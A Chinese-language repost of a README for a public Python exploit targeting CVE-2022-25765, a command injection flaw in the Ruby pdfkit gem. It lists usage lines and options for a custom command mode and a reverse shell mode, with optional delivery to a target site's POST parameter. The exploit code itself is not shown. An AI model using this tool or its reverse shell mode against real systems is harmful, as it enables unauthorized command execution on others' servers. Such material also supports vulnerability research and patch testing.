针对 CVE-2022–25765 的漏洞利用 (pdfkit) - 命令注入
2023-3-1 10:19:20 Author: Ots安全(查看原文) 阅读量:28 收藏

漏洞利用说明

ruby gempdfkit通常用于将网站或 HTML 转换为 PDF 文档。可以向该软件的易受攻击版本 (< 0.8.7.2) 传递一个包含将要执行的命令的特制 URL。此漏洞利用生成可执行 URL 或将它们发送到运行pdfkit.

用法

  python3 exploit-CVE-2022–25765.py -c <command>
python3 exploit-CVE-2022–25765.py -s <local-IP> <local-port>
python3 exploit-CVE-2022–25765.py -c <command> [-w <http://target.com/index.html> -p <parameter>]
python3 exploit-CVE-2022–25765.py -s <local-IP> <local-port> [-w <http://target.com/index.html> -p <parameter>]
python3 exploit-CVE-2022–25765.py -h

选项

  -c    Custom command mode. Provide command to generate custom payload with.
-s Reverse shell mode. Provide local IP and port to generate reverse shell payload with.
-w URL of website running vulnerable pdfkit. (Optional)
-p POST parameter on website running vulnerable pdfkit. (Optional)
-h Show this help menu.

下载

在此处下载 exploit-CVE-2022-25765.py

利用要求

  • python3

  • python3:requests

  • python3:urllib3

演示

自定义命令模式

反向 Shell 发送到目标网站模式

测试于

pdfkit 版本 0.8.6

适用于

pdfkit 版本 < 0.8.7.2

测试环境

gem install pdfkit -v 0.8.6

学分

  • https://nvd.nist.gov/vuln/detail/CVE-2022-25765

  • https://security.snyk.io/vuln/SNYK-RUBY-PDFKIT-2869795

项目地址:https://github.com/UNICORDev/exploit-CVE-2022-25765


文章来源: http://mp.weixin.qq.com/s?__biz=MzAxMjYyMzkwOA==&mid=2247496693&idx=1&sn=ee827a4c6bab65710bb4cf5f32f453d4&chksm=9badbabeacda33a80ea44359012cfe4848c4f7b21533ec9837a21f4ae5ed16025aa355cc4646#rd
如有侵权请联系:admin#unsafe.sh